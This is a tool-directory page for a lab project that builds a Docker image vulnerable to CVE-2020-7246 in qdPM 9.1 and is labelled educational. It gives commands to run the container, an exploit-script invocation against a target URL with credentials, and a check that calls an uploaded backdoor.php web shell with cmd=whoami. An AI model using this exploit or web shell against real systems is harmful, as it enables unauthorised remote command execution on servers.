Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
SecAssignment — A Docker image vulnerable to CVE-2020-7246. | Kitploit
Tools/GitHubGitHub/arafatansari/secassignment
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubarafatansari/secassignment

SecAssignment

A Docker image vulnerable to CVE-2020-7246.

View Repository
24 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-7246 (qdPM 9.1)

For educational purposes only.

See Reference for the details.

Run

root@kitploit:~
$ git clone https://github.com/arafatansari/SecAssignment.git
$ cd SecAssignment
$ docker build -t cve-assignment:ine .
$ docker run -it -p 80:80 cve-assignment:ine
$ service apache2 start | service mysql start

Exploit

root@kitploit:~
$ python Exploit/exploit.py -url http://{target-ip}/qdpm/ -u [email protected] -p password

Check (exploited)

root@kitploit:~
$ http://{target-ip}/qdpm/uploads/users/xxxx-backdoor.php?cmd=whoami
Download Tool